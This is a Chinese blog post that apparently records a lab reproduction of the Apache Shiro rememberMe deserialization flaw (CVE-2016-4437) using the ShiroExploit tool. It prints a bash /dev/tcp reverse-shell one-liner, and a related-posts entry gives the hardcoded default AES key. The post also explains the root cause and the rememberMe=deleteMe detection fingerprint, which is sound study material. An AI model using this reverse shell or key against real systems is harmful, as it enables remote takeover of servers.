shiro 反序列化 _CVE-2016-4437

最新推荐文章于 2024-06-20 08:00:00 发布
最新推荐文章于 2024-06-20 08:00:00 发布
阅读量245 收藏
点赞数
分类专栏: java 文章标签: java 开发语言 hdfs nginx tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/web13293720476/article/details/126496084
版权

1.环境搭建

实验靶机:CentOS7(192.168.2.102)

攻击机:Kali-Linux(192.168.2.101)

在CentOS7开启docker容器:

浏览器登录192.168.2.102:8080

2.漏洞利用

影响版本:Apache Shiro <= 1.2.4

下载shiro反序列化工具:

Release ShiroExploit v2.3 · feihong-cs/ShiroExploit-Deprecated (github.com)

填入靶机地址:

对kali的9999端口进行监听:

点击执行:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JIYV23xh-1640671674023)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211225131031.png)]

可以看到shell反弹成功,获取root权限

利用的的反弹shell:

bash -i >& /dev/tcp/IP/PORT 0>&1

放到网站上进行加密java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

3.漏洞分析

漏洞原因:

Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

漏洞特征:

shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段

web13293720476
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro反序列化漏洞环境搭建
帅醉了的博客
05-09 2646
kali下shiro反序列化漏洞环境搭建 git clone https://github.com/apache/shiro.git git checkout shiro-root-1.2.4 #进入shiro cd samples/web 安装mvn工具 sudo apt-get install openjdk-8-jdk sudo mkdir -p /usr/local/apache-maven wget http://ftp.wayne.edu/apache/maven/maven-3/3.3.9/
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
Shiro550 反序列化漏洞(CVE-2016-4437
最新发布
qq_68163788的博客
06-20 987
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
Shiro反序列化工具——ShiroAttack2
qq_44029310的博客
09-24 8304
shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题。作者为SummerSec。
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
shiro-attack-4.7.0-SNAPSHOT-all.zip
10-24
同时,他们应该熟悉Java序列化的安全风险,比如CVE-2015-4852等著名漏洞,以及如何通过设置安全的反序列化策略来防止这类攻击。 总的来说,这个工具包对于提升基于Apache Shiro构建的应用程序的安全性具有重要意义...
Attacking_Shiro_with_CVE_2020_2555
03-25
Attacking_Shiro_with_CVE_2020_2555前段时间项目上遇到了一个部署在Weblogic上的存在Shiro反序列化裂缝的Web应用,于是Y4er Y4er师傅的文章的文章调了下payload ,很遗憾当时并没有成功(可能是目标Weblogic打了...
shiro反序列化复现.zip
08-03
Apache Shiro在过去的版本中确实存在过这样的漏洞,例如CVE-2016-4437,攻击者可以利用此漏洞通过精心构造的序列化数据触发代码执行。 这个复现工具包可能包括以下内容: 1. **PoC(Proof of Concept)代码**:这...
Apache-Shiro反序列化1
08-03
然而,在 Apache Shiro 中存在一个严重的反序列化漏洞,CVE-2016-4437,攻击者可以利用该漏洞在服务器上执行恶意命令。 一、漏洞成因 Apache Shiro反序列化机制存在漏洞,该漏洞允许攻击者在服务器上执行恶意...
shiro_attack_2.2.zip
08-10
攻击者可以通过构造恶意的序列化数据,利用Shiro的RememberMe服务进行反序列化攻击,从而执行任意代码。 Shiro的RememberMe服务是用于在用户下次访问时自动登录的功能,它依赖于对用户会话信息的持久化。当用户选择...
ShiroExploit.V2.3rce图形化利用.zip
06-25
ShiroExploit.V2.3 shiro远程命令执行 550 721 一键漏洞利用 rce 图形化利用.zip
反序列化利用工具ShiroExploit.V2.51
10-14
漏洞检测工具
反序列化利用工具ShiroExploit.V2.51.7z
08-31
反序列化利用工具
Apache Shiro反序列化远程代码执行 复现 环境搭建
u010508029的博客
05-14 1016
docker pull medicean/vulapps:s_shiro_1 docker run -d -p 5001:8080 medicean/vulapps:s_shiro_1 yum install python3-devel pip3 install pycryptodome shiro.py # pip install pycrypto import sys import base64 import uuid from random import Random impo..
shiro反序列化搭建、利用、复现、漏洞原理
芜湖~米汤来喽~
01-07 1674
Shiro框架下框架供了记住密码的功能(RememberMe)用户登陆成功后会生成一个经过加密的Cookie其Cookie的RememberMe的Value的值是经过序列化、AES加密和base64编码后得到的结果。由于使用了AES加密,在Shiro1.2.4版本之前AES加密默认密钥的Base64编码值为kPH+bIxk5D2deZiIxcaaaA==,于是就可得到Payload的构造流程:恶意命令–>序列化–>AES加密–>base64编码–>发送Cookie–>回显数据–>数据解码。
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7643
shiro -550 反序列化(一)
JAVA反序列化学习--shiro反序列化分析
qq_53003652的博客
09-27 242
最近参加了某攻防活动,也是遇到了很多的shiro反序列化,上手后也是直接拿起工具就用,原理也仅仅是了解,菜鸟对于shiro也是有太多不了解的,接下来就详细分析一下shiro反序列化产生的原理。
shiro反序列化工具_实战shiro反序列化漏洞获取目标权限(550和721)
weixin_39929687的博客
11-27 874
shiro反序列化漏洞Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理功能。某些版本存在反序列化漏洞,并在去年闹得很火,每每实战攻防演习中必会出现,基本一打一个准儿。目前网上有很多shiro反序列化漏洞的复现过程,但基本都是基于shiro550,即Apache Shiro <= 1.2.4,鲜有针对shiro721的复现过程,当然也可能是因为其相...
CVE-2016-4437
08-14
CVE-2016-4437是关于Apache Shiro的一个安全漏洞。这个漏洞允许攻击者在受影响的应用程序上执行远程代码执行攻击,进而获得系统访问权限。在此漏洞中,攻击者可以通过反序列化攻击利用Shiro的RememberMe功能,从而执行恶意代码。在早于1.2.4版本的Shiro中,默认使用的是一个固定的AES密钥,攻击者可以使用已知的密钥来反序列化执行恶意代码。 要利用这个漏洞,攻击者可以使用Python脚本或在线工具生成反弹shell的命令,然后将其执行在目标服务器上。这样,攻击者就能够执行任意命令并与攻击机建立一个反向连接。 需要注意的是,利用CVE-2016-4437漏洞进行攻击是非法的,并且可能导致严重的安全后果。为了防止此类漏洞的利用,建议及时更新Shiro版本,并采取其他安全措施,如限制网络访问和使用强密码保护系统。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )](https://blog.csdn.net/weixin_60329395/article/details/127399081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值